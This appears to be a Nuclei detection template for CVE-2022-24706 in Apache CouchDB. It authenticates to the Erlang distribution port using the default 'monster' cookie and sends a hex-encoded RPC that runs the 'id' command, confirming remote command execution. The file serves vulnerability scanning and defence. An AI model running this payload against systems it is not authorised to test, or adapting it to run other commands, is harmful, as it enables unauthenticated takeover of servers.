id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
  metadata:
    max-request: 2
    shodan-query: product:"CouchDB"
    verified: "true"
  tags: cve,cve2022,network,couch,rce

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:9100"
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and